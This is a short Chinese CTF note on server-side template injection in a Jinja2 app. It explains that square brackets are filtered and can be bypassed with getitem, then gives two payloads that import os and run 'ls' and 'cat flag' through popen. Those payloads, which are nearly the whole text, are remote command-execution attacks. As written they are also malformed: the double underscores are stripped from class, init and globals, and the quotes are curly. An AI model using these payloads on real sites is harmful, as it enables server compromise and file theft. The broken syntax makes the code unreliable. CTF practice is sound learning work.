过滤了双引号(好像有双引号,我忘了)和中括号
    中括号能用getitem绕过
    {{ config.class.init.globals.getitem(‘os’).popen(‘ls’).read() }}
    {{ config.class.init.globals.getitem(‘os’).popen(‘cat flag’).read() }}